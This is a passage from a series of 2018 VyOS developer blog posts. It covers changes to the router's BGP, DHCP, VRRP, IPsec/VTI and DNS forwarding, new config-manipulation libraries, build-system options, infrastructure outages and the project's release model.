Making VyOS play well with that development requires an option to do that, and "address-family ipv4-unicast" is an obvious candidate, but introducing a special case doesn't feel write. I think moving original options to that subtree is a cleaner solution. Yes, it does require reprogramming your fingers, but when we start adding support for more address families, the original syntax will only start looking even more like an atavism.

This is what the new syntax will look like:

dmbaturin@vyos# show protocols bgp 
 bgp 64444 {
     address-family {
         ipv4-unicast {
             network 192.168.2.0/24 {
             }
         }
     }
     neighbor 10.91.19.1 {
         address-family {
             ipv4-unicast {
                 allowas-in {
                     number 3
                 }
                 as-override
                 default-originate {
                     route-map Foo
                 }
                 maximum-prefix 50
                 route-map {
                     export Bar
                     import Baz
                 }
                 weight 10
             }
         }
         ebgp-multihop 255
         remote-as 64793
     }
}

Node renaming in migration scripts

Renaming nodes is a very common task in config syntax migration, but until now it could only be done very indirectly. The old XorpConfigParser simply could not separate names from values and renaming nodes was usually done by regex replace. In the new vyos.configtree you'd need to delete the old node and recreate it from scratch.

Until now. Lately we introduced a function that does it one step. If you, for whatever reason, wanted to rename "service ssh" subtree to "service secure-shell", you could do it like this:

with open("/config/config.boot") as f:
    config_text = f.read()
config = vyos.configtree.ConfigTree(config.text)

config.rename(["service", "ssh"], "secure-shell")

print(config.to_string())

One of the reason for introducing it is to make it easier to clean up the DHCP server syntax.

DHCP server rewrite

While we are waiting for the FRR fixes, we (Christian Poessinger and I mainly) decided to eliminate one more bit of the legacy code and give DHCP server scripts a rewrite. We also decided to clean up its syntax.

One of the things that always annoyed me was nested nodes for address ranges: "subnet 192.0.2.0/24 start 192.0.2.100 stop 192.0.2.100". Now start and stop will be different nodes, so that they are easy to change independently: "subnet 192.0.2.0/24 range Foo start 192.0.2.100; ... stop 192.0.2.200".

We will also rename the unwieldy "shared-network-name" to "pool". Operational mode commands always used the "pool" terminology, so it will also improve command consistency.

Wireguard support

Thanks to our contributor who goes by hagbard, VyOS now supports wireguard. The work on it is nearly complete, and will be covered in a separate post.

TFTP server support

Thanks to Christian Poessinger, VyOS now has TFTP server. It was a frequently requested feature, and I think it makes sense for people who keep DHCP on the router and do not want to setup another machine for provisioning phones, think clients and so on.

This is an example of TFTP server with all options set:

service {
 tftp-server {
     allow-upload
     directory /config/tftp
     listen-address 192.0.2.10
     port 69
 }
}

DMVPN works again

Thanks to our contributor Runar Borge, we have identified the cause and fixed the issues that broke DMVPN after upgrading to the latest upstream StrongSWAN. It should now work as expected.

L2TP/IPsec works again

One of the blockers introduced by upgrade to StrongSWAN 5.6 was broken L2TP/IPsec. We've adjusted the config to use the new syntax and now it works again.

More to come

We are actively working on getting the codebase ready for the release candidate. Stay tuned for new updates!

Build server maintenance

2018-09-02T12:16:55Z

We are doing some maintenance on ci.vyos.net and the build hosts. They may be inaccessible for an hour or two. We will notify you if it takes longer than expected.

VyOS 1.2.0 development news in July

2018-08-06T14:00:54Z

Despite the slow news season and the RAID incident that luckily slowed us down only for a couple of days, I think we've made good progress in July.

First, Kim Hagen got cloud-init to work, even though it didn't make it to the mainline image, and WAAgent required for Azure is not working yet. Some more work, and VyOS will get a much wider cloud platform support. He's also working on Wireguard integration and it's expected to be merged into current soon.

The new VRRP CLI and IPv6 support is another big change, but it's got its own blog post, so I won't stop there and cover things that did not get their own blog posts instead.

IPsec and VTI

While I regard VTI as the most leaky abstraction ever created and always suggest using honest GRE/IPsec instead, I know many people don't really have any choice because their partners or service providers are using it. In older StrongSWAN versions it used to just work.

Updating StrongSWAN to the latest version had an unforeseen and very unpleasant side effect: VTI tunnels stopped working. A workaround in form of "install_routes = no" in /etc/strongswan.d/charon.conf was discovered, but it has an equally bad side effect: site to site tunnels stop working when it's applied.

The root cause of the problem is that for VTI tunnels to work, their traffic selectors have to be set to 0.0.0.0/0 for traffic to match the tunnel, even though actual routing decision is made according to netfilter marks. Unless route insertion is disabled entirely, StrongSWAN thus mistakenly inserts a default route through the VTI peer address, which makes all traffic routed to nowhere.

This is a hard problem without a workaround that is easy and effective. It's an architectural problem in the new StrongSWAN, according to our investigation of its source code and its developer responses, there is simply no way to control route insertion per peer. One developer responded to it with "why, site to site and VTI tunnels are never used on the same machine anyway" — yeah, people are reporting bugs just out of curiosity.

While there is no clean solution within StrongSWAN, this definitely has been a blocker for the release candidate. Reimplementing route insertion with an up/down script proved to be a hard problem since there are lots of cases to handle and complete information about the intended SA may not always be available to scripts. Switching to another IKE implementation seems like an attractive option, but needs a serious evaluation of the alternatives, and a complete rewrite of the IPsec config scripts — which is planned, but will take a while because the legacy scripts is an unmaintainable mess.

I think I've found a workable (even if far from perfect workaround) — instead of inserting missing routes, delete the bad routes. I've made a test setup and it seems to work reasonably well. The obvious issue is that it doesn't prevent bad things from happening, but rather undoes the damage, so there may still be a brief traffic disruption when VTI tunnels go up. Another problem is a possible race condition between StrongSWAN inserting routes and the script deleting them, though I haven't seen it in practice yet and I hope it doesn't exist. But, at least you can now use both VTI and site to site tunnels on the same machine.

For people who want to use VTI exclusively, there is now "set vpn ipsec options disable-route-autoinstall" option that disables route insertion globally, thus removing the possible disruption, at cost of making site to site tunnels impossible to use. That option is disabled by default.

I hope it will be good enough until we find a better solution. Your testing is needed to confirm that it is!

On "run reset vrrp master"

2018-07-28T19:10:22Z

I've just exorcised a ghost of the old VRRP CLI implementation — the "reset vrrp master" command. I thought it would go away with the vyatta-vrrp package, but in fact it was in vyatta-op. It made me remember that I was going to write about it in the original blog post, but somehow I forgot about it.

Here is why that command was not reimplemented. First, it never worked with preempt to begin with, and with preempt being the default, its usefulness was already limited.

A more serious reason, however, is that it was a rather horrible (even if ingenious) kludge. This is how it worked: first it tried to locate the VRRP group in keepalived.conf, then it would remove it from the config, restart keepalived, insert it again, and restart keepalived again. It sort of worked, but you can see how fragile this approach is. If anything at any stage would go wrong, it would leave VRRP in an inconsistent state.

A much cleaner and general way to do it is to just disable the VRRP group in conf mode (set high-availability vrrp group Foo disable) and commit the change.

New VRRP CLI is here (with IPv6 support)

2018-07-27T22:10:19Z

Ever since I started with Vyatta, I've had a problem with commands for features unrelated to interfaces being defined inside interfaces. I'm sure the person who came up with that arrangement meant well and thought it would be familiar for Cisco and Juniper users, but the more I lived with it, the more I thought it creates more problems than it solves.

From the user perspective, it's hard to easily view the complete configuration of those features. It's also much harder to clone a feature config to another machine. And if you ever want to move some connection to a different NIC, things get even more fun.

For developers, however, it's even worse. First, it means commands for those features needs to be duplicated for every interface type, which makes adding new interfaces much harder. Second, configuration scripts end up more complex due to paths that can be nested quite deeply. Third, with the current config backend specifically, lack of nested end nodes can lead to very interesting tracking of the state to avoid repeated service restarts.

Until recently there was a token excuse for leaving unfortunate UI decisions alone — the difficulty of writing migration scripts. Luckily, it's no longer the case, so we can start cleaning it up. Ok, it is hard and you need to take care of many details, but at least you are not wrestling with a library that is simply inadequate for the task. Now we can go on a quest to remove excessive nesting and redesign the UI is an easier to use, more logical fashion.

VRRP looked a good feature to start the clean up with — we need to get IPv6 VRRP support to work in the end, its scripts have accumulated quite some cruft, and, well, it really has nothing to do with interface settings since it's a protocol of its own implemented by a userspace daemon.

Today I've rolled out the new implementation and it is already in the latest rolling release image, ready for your testing. Let's walk through the changes.

Making first boot scripts just got easier (but building vyos-1x got a bit harder)

2018-07-18T10:22:25Z

As you probably know already, we are working on integrating cloud-init into VyOS, which will allow us to support multiple cloud platforms, and get rid of the custom script for EC2. The hard part of this project is that just allowing cloud-init to do what it normally does in Debian would not produce desired results, we need to make it modify the config.

This raises a question when this should occur and how it should be done. Since modifying running config with scripts has its difficulties in the current backend, and even if it didn't, it still could potentially clash with user's commits, we thought we may want to modify the config.boot file before it's loaded instead.

One advantage is that once we have common functionality implemented, it can be reused not only in cloud-init, but also in the installer, and in custom first boot scripts if someone wants them.

To test this concept, I've added a library names vyos.initialsetup that includes a collection of functions for common settings such as user passwords and keys, host name, default route, name servers, and interface addresses.

Here's an example of a script you can run on your system for demonstration (adjust user name and do ssh-keygen if necessary):

#!/usr/bin/env python3

import vyos.configtree as vct
import vyos.initialsetup as vis

with open('/opt/vyatta/etc/config.boot.default') as f:
    config_string = f.read()

with open('/home/dmbaturin/.ssh/id_rsa.pub') as f:
    key_string = f.read()

config = vct.ConfigTree(config_string)

vis.set_user_password(config, 'vyos', 'qwerty')
vis.set_user_ssh_key(config, 'vyos', key_string)

# Default level is admin
vis.create_user(config, 'dmbaturin', password=None, key=key_string)

# Default type is ethernet
vis.set_interface_address(config, 'eth0', '192.0.2.10/24')

vis.set_default_gateway(config, '192.0.2.1')

vis.set_name_servers(config, ['203.0.113.10', '203.0.113.20'])

vis.set_host_name(config, 'vyos-test')

print(str(config))

The script will print a customized config based on the default config.

Building vyos-1x

This is the good thing. The bad, or rather somewhat inconvenient thing is that vyos-1x package build now depends on the libvyosconfig0 package that provides the library behind the vyos.configtree module, and it's essential for running unit tests for those modules.

You should add the "deb http://dev.packages.vyos.net/repositories/current/vyos/ current main" repository to the sources.list on your build machine and install libvyosconfig0 with APT, or simply take the file from the repo and install it by hand with dpkg.

I hope the increased reliability we gain from those unit test outweighs the inconvenience of additional setup.

Infrastructure failure resolved, downloads.vyos.io is back now

2018-07-13T13:36:38Z

We have managed to resolve the infrastructure problems and bring the affected machines back intact. Now downloads.vyos.io and ci.vyos.net are back online, and our build hosts with all the build dependencies setup and uncommited code are back online too, so luckily we can resume the work from the point where it was stopped by the RAID issue.

We are not ready to give a complete post mortem on the actual issue yet (may not even be able to at all) since we have limited data and the service provider support was not exactly helpful. What we can say now is that what was thought to be RAID5 actually was a RAID1 with an additional hot spare drive, and the failure mode included a RAID controller glitch apart from drive failure. The hot spare drive is what allowed us to bring the data back intact.

While this issue was resolved without any data loss, it definitely prompts us to reconsider many things about our infrastructure, including backup strategy, deployment mechanisms, and service provider choice.

We are going to write new posts as we decide upon the options and roll out improvements. Infrastructure deployment is also a good area for contributions, and some people already offered help.

Infrastructure failure

2018-07-13T09:05:40Z

Hi everyone,

We've had a catastrophic failure on one of our hosts: two drives in a RAID5 failed simultaneously. A number of VMs related to the development infrastructure are permanently lost and need to be restored since we didn't have backups of them.

The only piece public infrastructure affected by it is downloads.vyos.io. You can use the old packages.vyos.net server or one of the mirrors to download the stable (1.1.8) or historical VyOS releases.

The other pieces of infrastructure that need to be restored are the Jenkins server, the build machines, and the repositories server. We'll have to restore them before we can continue development. I hope we'll get it done by Monday.

Building VyOS images with custom packages just got simpler

2018-06-27T12:44:58Z

While the new build scripts first introduced when we migrated the development branch to jessie made things much simpler for developers and for people who just want to build the latest VyOS image from source, building an image even simply with a package available from Debian Jessie repos but not present in the VyOS package set by default was still quite an ordeal for a person not familiar with live-build and the structure of our build scripts.

Well, until now. Yesterday I've added ./configure script options that should allow everyone to build a custom image without ever touching the plumbing of the build scripts.

The simplest example, building an image with packages available in Debian Jessie:

./configure --custom-packages "bsdgames robotfindskitten"
sudo make iso

A more interesting example, adding a package from a third party repo signed with its own key. In this case, salt-minion:

wget https://repo.saltstack.com/apt/debian/8/amd64/2017.7/SALTSTACK-GPG-KEY.pub
./configure --custom-apt-entry "deb http://repo.saltstack.com/apt/debian/8/amd64/2017.7 jessie main" --custom-packages "salt-minion" --custom-apt-key ./SALTSTACK-GPG-KEY.pub
sudo make iso

Of course it doesn't guarantee that your image will build or work, but at least it will get you to the debugging phase faster,

Versions mystery revealed

2018-06-25T16:48:31Z

Over last few years, I saw many combinations and theories around VyOS, Vyatta, EdgeOS that I decided to shed light on this and also explain current and future VyOS versions

First was Vyatta

You can read the detailed history here at Wikipedia, and I just tell that all started back in 2006 (12 years ago!) and with release v6.0 in 2010 Vyatta Community renamed to Vyatta Core to highlight the fact that the Vyatta Subscription was no longer a separate product, but the open source version extended with proprietary add-ons. In retrospect, this is often seen as the beginning of the end. At the time the future of the open source Vyatta didn’t look as bleak though, and while since 6.0 Vyatta officially became “open core” (aka “freemium”), that release incorporated features formerly available only in the proprietary version, along with significant new features like image-based upgrade, and it seems like a sustainable model for a time.

In 2011 Ubiquiti Networks launched their EdgeMax line of products. EdgeOS™ is the essential part of the product line and is a fork of Vyatta Core 6.3 that exclusively runs on Cavium backed hardware produced by Ubiquiti Networks (EdgeRouter Lite, PoE, Pro) Since then they migrated to Debian 7 and replaced quagga with proprietary ZebOS™

In 2012 Vyatta was acquired by Brocade, and in April 2013 they renamed Vyatta Subscription Edition (VSE) to the Brocade Vyatta 5400 vRouter (and later also 5600) those a no longer open source. By that time all community resources were wiped, and future of Vyatta Core was obvious.

In late 2013 Daniil initiated fork of Vyatta Core 6.6 under VyOS name. It's a start of development of so-called old stable 1.1.x series which based on Debian 6 (patched all the way) the latest version is 1.1.8 and now in Extended support

fall of 2015, we began an upgrade of VyOS project in many senses, that is a time when 1.2.x started (decision to skip Debian 7 and go directly to Debian 8 which includes migration to systemd among other things) enhancements and new development happening in the rolling version that we introduced some time ago.

Now that know the background, it’s a good time to describe the details on the new VyOS release model.

Rolling

You can already download binary images of the rolling release of VyOS 1.2.x here, which are snapshots of the current development state. All new features, refactoring of old code, improvements of the OS package base go there before they can become a part of a release candidate or a stable release.

Rolling release builds may break occasionally, and new features may not work as expected. They are meant for contributors and networking enthusiasts who are willing to help us test those features.

Release Candidate (RC)

About every six months, we will start a new release cycle. The cycle will begin with branching off the rolling release and preparing a release candidate. Release candidates are neither code nor feature frozen, as we fix bugs or design issues, or new features in rolling become stable and well tested, we may prepare a new RC that incorporates them.

Release candidates are supposed to be stable enough for non-critical production, but if you prefer stability over new features, you may want to stick with EPA or LTS.

Early Production Access (EPA)

After RC cycle is over and the release is sufficiently stable, it will become the basis for the next LTS release.

EPA is for customers and community members who want new features before they are available in the LTS, and are willing to help us weed out last bugs in those new features.

Long Term Support (LTS)

LTS version of VyOS will be receiving security patches and high priority fixes from rolling releases.

They are meant for enterprise and service provider users who value stability over everything.

We’d like to encourage everyone to install the least stable version to help us with testing.

As bonus

VyOS to Debian version map

All product names, logos, and brands are property of their respective owners.

VyOS 1.2.0 development news in June

2018-06-20T16:33:25Z

If we haven't written any new blog posts in a while, that's because we've all been busy with development. Here is what happened since the last status update.

RADIUS authentication and authorization

We've had nominal support for RADIUS authentication for system login for a long time, but it was essentially useless because it required that the user account to already exist in VyOS to actually work, it was just a password checking method.

Kim Hagen found a way to implement real support for it and it appears to work fine (but of course needs testing). Apart from authentication, his implementation also supports authorization through the priv-lvl attribute. Privilege level 15 is mapped to admin users, anything below it is operator. This seems to be the most common way to do that, after Cisco.

Correct naming of PPTP and L2TP interfaces works again

The idea to switch to the upstream PPPD turned out to be premature — while it does have support for pre-up scripts, it still makes an assumption that the interface name is not changed by pre-up script, so remote access VPN interfaces were named pppX, which broke the "run show vpn remote-access" commands, and would break zone-based firewalls of people who rely on that naming.

We've re-applied the old patches for it to the latest upstream PPPD and opened pull requests for them, so if they are merged, we can finally stop building our own, and if not, we have clean patches that should be easy to apply to future releases.

Writing migration scripts (and manipulating VyOS config files outside VyOS) just got easier

2018-05-28T11:42:30Z

Long story short

VyOS 1.2.0-rolling (starting with the next nightly build) includes a library for parsing and manipulating config files without loading them into the system config. It can be used for automatically converting configs from old versions in case an incompatible change was made, and for standalone utilities. Motivation and history are discussed below.

Here is an example of interacting with the new library:

>>> from vyos import configtree

>>> c = configtree.ConfigTree("system { host-name vyos \n } interfaces { dummy dum0 { address 192.0.2.1/24 \n address 192.0.2.20/24 \n disable \n } }  /* version: 1.2.0 */")

>>> print(c.to_string())
system {
    host-name vyos
}
interfaces {
    dummy dum0 {
        address 192.0.2.1/24
        address 192.0.2.20/24
        disable { }
    }
}

 /* version: 1.2.0 */

>>> c.set(['interfaces', 'dummy', 'dum0', 'address'], value='293.0.113.3/32', replace=False)

>>> c.delete_value(['interfaces', 'dummy', 'dum0', 'address'], '192.0.2.1/24')

>>> c.delete(['interfaces', 'dummy', 'dum0', 'disable'])

>>> c.is_tag(['interfaces', 'dummy'])
True

>>> c.exists(['interfaces', 'dummy', 'dum0', 'disable'])
False

>>> c.list_nodes(['interfaces', 'dummy'])
['dum0']

>>> print(c.to_string())
system {
    host-name vyos
}
interfaces {
    dummy dum0 {
        address 192.0.2.20/24
        address 293.0.113.3/32
    }
}

 /* version: 1.2.0 */

As you can see, it largely mimics the API you get for the running config. The only notable differences are that the "set" method requires that you specify the path and the value separately, and to have nodes formatted as tag nodes (i.e. "ethernet eth0 { ..." as opposed to "ethernet { eth0 { ..." you need to mark them as such with "set_tag", unless they were originally formatted that way in the config you parsed.

Things the new style configuration mode definitions intentionally do not support

2018-05-21T11:44:57Z

I've made three important changes to the design of the configuration command definitions, and later I realized that I never wrote down a complete explanation of the changes and the motivation behind them.

So, let's make it clear: these changes are intentional and they shouldn't be reintroduced. Here's the details:

The "type" option

In the old definitions, you can see the "type:" option in the node.def files very often. In the new style XML definitions, there's no equivalent of it, and the type is always set to "txt" in autogenerated node.def's for tag and leaf nodes (which means "anything" to the configuration backend).

I always felt that the "type" option suffers from two problems: scope creep and redundancy.

The scope creep is in the fact that "type" was used for both value validation and generating completion help in "val_help:" option. Also, the "u32" type (32-bit unsigned integer) has a little known undocumented feature: it could be used for range validation in form of "type: u32:$lower-$upper" (e.g. u32:0-65535). It has never been used consistently even by the original Vyatta Core authors, plenty of node.def's use additional validation statements instead.

Now to the redundancy: there are two parallel mechanisms for validations in the old style definitions. Or three, depending on the way you count them. There are "syntax:expression:" statements that are used for validating values at set time, and "commit:expression:" that are checked at commit time.

My feeling from working with the system for scary amount of time was that the "type" option alone is almost never suffucient, and thus useless, since actual, detailed validation is almost always done elsewhere, in those "syntax/commit:expression:" statements or in the configuration scripts. Sometimes a "commit:expression:" is used where "syntax:expression:" would be more appropriate (i.e. validation is delayed) but let's focus on set-time validation only.

But without data to back it up, a feeling is just a feeling, so I made up a quick and dirty script to do some analysis. You can repeat what I've done easily with "find /opt/vyatta/share/vyatta-cfg/templates/ -type f -maxdepth 100 -name 'node.def' | nodecheck.py".

On VyOS 1.1.8 (which doesn't include any rewritten code) the output is:

Has type: 2737
Has type txt: 1387
Has type other than txt: 1350
Has commit or syntax expression: 1700
Has commit or syntax expression and type txt: 740
Has commit or syntax expression and type other than txt: 960

While irrelevant to the problem on hand, the total count of node.def's is 4293). In other words, of all nodes that have the type option, 50% have it set to "txt". Some of them are genuinely "anything goes" nodes such as "description" options, but most use it as a placeholder.

68% of all nodes that have a type are also using either "syntax:expression:" or "commit:expression:". Of all nodes that have a type more specific than "txt", 73% have additional validation. This means that even for supposedly specific types, type alone is enough only in 23% cases. This raises the question whether we need types at all.

Sure, we could introduce more types and add support for something of a sum type, but is it worth the trouble if validation can be easily delegated to external scripts? Besides, right now types are built in the config backend, which means adding a new one requires modifying it starting from the node.def parser.

In the new style definitions, I felt like the only special case that is special enough is regular expression. This is how value constraints checked at set time are defined:


  
    
      (baz|baz)
      quux

Here the "validator" tag contains a reference to a script stored in /usr/libexec/vyos/validators/. Since adding a new validator is easy, there's no reason to hesitate to add new ones for common (and even not so common) cases. Note that "regex" option is automatically wrapped in ^$, so there's no need to do it by hand every time.

Default values

The old definitions used to support "default:" option for setting default values for nodes. It looks innocous on the surface, but things get complicated when you look deeper into its behaviour.

You may think a node either exists, or it does not. What is the value of a node that doesn't exist? Sounds rather like a Zen koan, but here's cheap enlightenment for you: it depends on whether it has a default value or not.

Thus, nodes effectively have three states: "doesn't exist", "exists", and "default". As you can already guess, it's hard to tell the latter two apart. It's also very hard to see if a node was deleted from a config or just reset to a default value. It also means that every node lookup cannot operate on the running config tree alone and has to consult the command definitions as well, which is very bad if you plan to use the same code for the CLI and for standalone config handling programs such as migration scripts.

Last time people tried to introduce rollback without reboot, the difficulties of handling the third virtual "default" state was one of the biggest problems, and it's still one of the reasons we don't have a real rollback. VyConf has no support for default values for this reason, so we should eliminate them as we rewrite the code.

Defaults should be handled by config scripts now. Sure, we lose "show -all" and the ability to view defaults, but the complications that come with it hardly make it worth the trouble. There are also many implicit defaults that come from underlying software options anyway.

Embedded shell scripts

That's just a big "no". Have you ever tried to debug code that is spread across multiple node.def's in nested directories and that cannot be executed separately or stepped through?

While it's tempting to allow that for "trivial" scripts, the code tends to grow and things get ugly. Look the the implementation of PPPoE or tunnel interfaces in VyOS 1.1.8.

If it's more than one command, make it an external script, and you'll never regret the decision when it begins to grow.

New-style operational mode command definitions are here

2018-05-16T16:50:29Z

We've had a convertor from the new style configuration command definitions in XML to the old style "templates" for a while in VyOS 1.2.0. As I predicted, a number of issues were only discovered and fixed as we have rewritten more old scripts, but by now they should be fully functional. However, until very recently, there was no equivalent of it for the operational mode commands. Now there is.

The new style

In case you've missed our earlier posts, here's a quick review. The configuration backend currently used by VyOS keeps command definitions in a very cumbesome format with a lot of nested directories where a directory represents a nesting level (e.g. "system options reboot-on-panic" is in "templates/system/options/reboot-on-panic"), a file with command properties must be present in every directory, and command definition files are allowed to have embedded shell scripts.

This makes command definitions very hard to read, and even harder to write. We cannot easily change that format until a new configuration backend is complete, but we can abstract it away, and that's what we did.

The new command definitions are in XML, and a RelaxNG schema is provided, so everyone can see its complete grammar and automatically check if their definitions are correctly written. Automated validation is already integrated in the build process.

Rewriting the command definitions goes along with rewriting the code they call. New style code goes to the vyos-1x package.

VyOS 1.2.0 status update

2018-05-11T08:33:05Z

While VyOS 1.2.0 nightly builds have been fairly usable for a while already, there are still some things to be done because we can make a named release candidate from it. These are the things that have been done lately:

EC2 AMI scripts retargeting and clean up

The original AMI build scripts had been virtually unchanged since their original implementation in 2014, and by this time they've had ansible warnings at every other step, which prompted us to question everything they do, and we did. This resulted in a big spring cleanup of those scripts, and now they are way shorter, faster, and robust.

Other than the fact that they now work with VyOS 1.2.0 properly, one of the biggest improvements from the user point of view is that it's now easy to build an AMI with a custom config file simply by editing the file at playbooks/templates/config.boot.default.ec2

The primary motivation for it was to replace cumbersome in-place editing of the config.boot.default from the image with a single template, but in the end it's a win-win solution for both developers and users.

The original scripts were also notorious for their long execution time and fragility. What's worse is that when they failed (and it's usually "when" rather than "if"), they would leave behind a lot of gargabe they couldn't automatically clean up, since they used to create a temporary VPC complete with an internet gateway, subnet, and route table, all just for a single build instance. They also used a t2.medium instance that was clearly oversized for the task and could be expensive to leave running if clean up failed.

Now they create the build instance in the first available subnet of the default VPC, so even if they fail, you only need to delete a t2.micro instance, a key pair, and a security group.

It is no longer possible to build VyOS 1.1.x images with those scripts from the baseline code, but I've created a tag named 1.1.x from the last commit where it was possible, so you can do it if you want to — without these recent improvements of course.

Package upgrades and new drivers

We've upgraded StrongSWAN to 5.6.2, which hopefully will fix a few longstanding issues. Some enthusiastic testers are already testing it, but everyone is invited to test it as well.

SR-IOV is now basically a requirement for high performance virtualized networking, and it needs appropriate drivers. Recent nightly builds include a newer version of Intel's ixgbe and Mellanox OFED drivers, so the support for recent 10gig cards and SR-IOV in particular has improved.

A step towards using the master branch again

The "current" git branch we use throughout the project where everyone else uses "master" was never intended to be a permanent setup: it always was a workaround for the master branch in packages inherited from Vyatta Core being messed up beyond any repair. It will take quite some time to get rid of the "current" branch completely and we'll only be able to do it when we finally consolidate all the code under vyos-1x, but we've made jenkins builds correctly put the packages built from the "master" branch in our development repository, so we'll be able to do it for packages that do not include any legacy code at least.

IPv6 VRRP status

This is the most interesting part. IPv6 VRRP is perhaps a single most awaited feature. Originally it was blocked by lack of support for it in keepalived. Now keepalived supports it, but integrating it will need some backwards-incompatible changes.

Originally, keepalived allowed mixing IPv4 and IPv6 in the same group, but it no longer allows it (curiously, the protocol standard does allow IPv4 advertisments over IPv6 transport, but I can see why they may want to keep these separate). This means to take advantage of the improvements it made, we also have to disallow it, thus breaking the configs of people who attempted to use it. We've been thinking about keeping the old syntax while generating different configs from it, or automated migration, but it's not clear if automated migration is really feasible.

An incompatible syntax change is definitely needed because, for example, if we want to support setting hello source address or unicast VRRP peer address for both IPv4 and IPv6, we obviously need separate options.

Soon IPv6 addresses in IPv4 VRRP groups will be disallowed and syntax for IPv6-only VRRP groups will be added alongside the old vrrp-group syntax. If you have ideas for the new syntax, the possible automated migration, or generally how to make the transition smooth, please comment on the relevant task.

PowerDNS recursor instead of dnsmasq

The old dnsmasq (which I, frankly, always viewed as something of a spork, with its limited DHCP server functionality built into what's mainly a caching DNS resolver), has been replaced with PowerDNS recursor, a much cleaner implementation.

On security of GRE/IPsec scenarios

2018-04-27T13:33:11Z

As we've already discussed, there are many ways to setup GRE (or something else) over IPsec and they all have their advantages and disadvantages. Recently an issue was brought to my attention: which ones are safe against unencrypted GRE traffic being sent?

The reason this issue can appear at all is that GRE and IPsec are related to each other more like routing and NAT: in some setups their configuration has to be carefully coordinated, but in general they can easily be used without each other. Lack of tight coupling between features allows greater flexibility, but it may also create situations when the setup stops working as intended without a clear indication as to why it happened.

Let's review the knowingly safe scenarios:

VTI

This one is least flexible, but also foolproof by design: the VTI interface (which is secretly simply IPIP) is brought up only when an IPsec tunnel associated with it is up, and goes down when the tunnel goes down. No traffic will ever be sent over a VTI interface until IKE succeeds.

Tunnel sourced from a loopback address

If you have missed it, the basic idea of this setup is the following:

set interfaces dummy dum0 address 192.168.1.100/32

set interfaces tunnel tun0 local-ip 192.168.1.100/32
set interfaces tunnel tun0 remote-ip 192.168.1.101/32 # assigned to dum0 on the remote side

set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 local prefix 192.168.1.100/32
set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 remote prefix 192.168.1.101/32

Most often it's used when the routers are behind NAT, or one side lacks a static address, which makes selecting traffic for encryptions by protocol alone impossible. However, it also introduces tight coupling between IPsec and GRE: since the remote end of the GRE tunnel can only be reached via an IPsec tunnel, no communication between the routers over GRE is possible unless the IPsec tunnel is up. If you fear that any packets may be sent via the default route, you can nullroute the IPsec tunnel network to be sure.

The complicated case

Now let's examine the simplest kind of setup:

set interfaces tunnel tun0 local-ip 192.0.2.100 # WAN address
set interfaces tunnel tun0 remote-ip 203.0.113.200

set vpn ipsec site-to-site peer 203.0.113.200 tunnel 1 protocol gre

In this case IPsec is setup to encrypt the GRE traffic to 203.0.113.200, but the GRE tunnel itself can work without IPsec. In fact, it will work without IPsec, just without encryption, and that is the concern for some people. If the IPsec tunnel goes down due to misconfiguration, it will fall back to the common, unencrypted GRE.

What can you do about it?

As a user, if your requirement is to prevent unencrypted traffic from ever being sent, you should use VTI or use loopback addresses for tunnel endpoints.

For developers this question is more complicated.

What should be done about it?

The opinions are divided. I'll summarize the arguments here.

Arguments for fixing it:

Cisco does it that way (attempts to detect that GRE and IPsec are related — at least in some implementations and at least when it's referenced as IPsec profile in the GRE tunnel)
The current behaviour is against user's intentions

Arguments against fixing it:

Attempts to guess user's intentions are doomed to fail at least some of the time (for example, what if a user intentionally brings an IPsec tunnel down to isolate GRE setup issues?)
The only way to guarantee that unencrypted traffic is never sent is checking for a live SA matching protocol and source before forwarding every packet — that's not good for performance).

Practical considerations:

Since IKE is in the userspace, the kernel can't even know that an SA is supposed to exist until IKE succeeds: automatic detection would be a big change that is unlikely to be accepted in the mainline kernel.
Configuration changes required to avoid the issue are simple

If you have any thoughts on the issue, please share with us!

When VyOS CLI isn't enough

2018-04-20T14:58:39Z

Sometimes a particular configuration option is supported by the software that VyOS uses, but the CLI does not expose it. Since VyOS is open source, you can always fix that, but sometimes you need it by tomorrow, and there's simply no time to do it.

In a number of places, we've left an escape hatch for it that allows bypassing the CLI and including a raw snippet into the generated config. Of course, you give up the sanity checks of the CLI and take full responsibility for the correctness of the resulting config, but sometimes it's necessary.

OpenVPN

In openvpn, we have an option called "openvpn-option". You can pass any options to OpenVPN process with it, but note that in the current versions, it has to follow the command line rather than config file option, i.e. prepend it with "--". See this example:

set interfaces openvpn vtun10 openvpn-option "--connect-freq 10 60"

Note that the "push" option em is supported. I see OpenVPN configs with openvpn-option heavily overused once in a while — before including an option, make sure what you need to do is really not supported.

DHCP server

In the DHCP server, there is not one, but too escape hatches. One is the "subnet-parameters" option under "subnet". Another one is a "global-parameters" under "shared-network-name".

See an example:

set service dhcp-server shared-network-name LAN subnet 10.0.0.0/24 subnet-parameters "ping-timeout 5;"

Since dhcpd.conf syntax is more complex than just a list of options, it's important to make sure that generated config will be valid. It's easy to make your DHCP server stop loading and spend some time reading the log to see what is wrong, so be careful here.

Note that these options are not supported by the DHCPv6 server. Anyone thinks we should support it?

Dynamic DNS

In dynamic DNS, you can use the generic HTTP method if your provider and protocol is not supported.

set service dns dynamic interface eth0 use-web url http://dyndns.example.com/?update

Since no one can possibly support all providers, I believe it will remain a necessary option forever.

When all else fails: the postconfig script

If something is not supported and doesn't have a handy escape hatch, you still can implement it with the postconfig script. That script is found at /config/scripts/vyatta-postconfig-bootup.script and runs after config.boot loading is complete, so it's particularly conductive to manipulating things like raw iptables rules.

VyOS doesn't delete or overwrite anything in the global netfilter tables after boot, so it's safe to put your commands there, for example "/sbin/iptables -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu" for global MSS clamping.

You still need to be careful not to conflict with any of the rules inserted by VyOS though, in general, so always make sure to check what exactly VyOS generates before using the postconfig script.

Looking forward

VyOS 1.2.0 brings improvements to the postconfig script execution and adds some more escape hatches — stay tuned for updates.

DNS forwarding in VyOS

2018-04-13T12:00:00Z

A lot of small networks do not have their own DNS server, but it's not always desirable to just leave hosts to use an external third-party server either, that's why we've had DNS forwarding in VyOS for a long time and are going to keep it there for the foreseeable future.

Experienced VyOS users already know all about it, but we should post something for newcomers too, shouldn't we?

Configuring DNS forwarding is very simple. Assuming you have "system name-server" set, all you need to do to simply forward requests from hosts behind eth0 to it is "set service dns forwarding listen-on eth0". Repeat for every interfaces where you have clients and you are done.

There are some knobs for telling the service to use or not use specific DNS servers though:

set service dns forwarding listen-on eth0

# Use name servers from "system name-server"
set service dns forwarding system

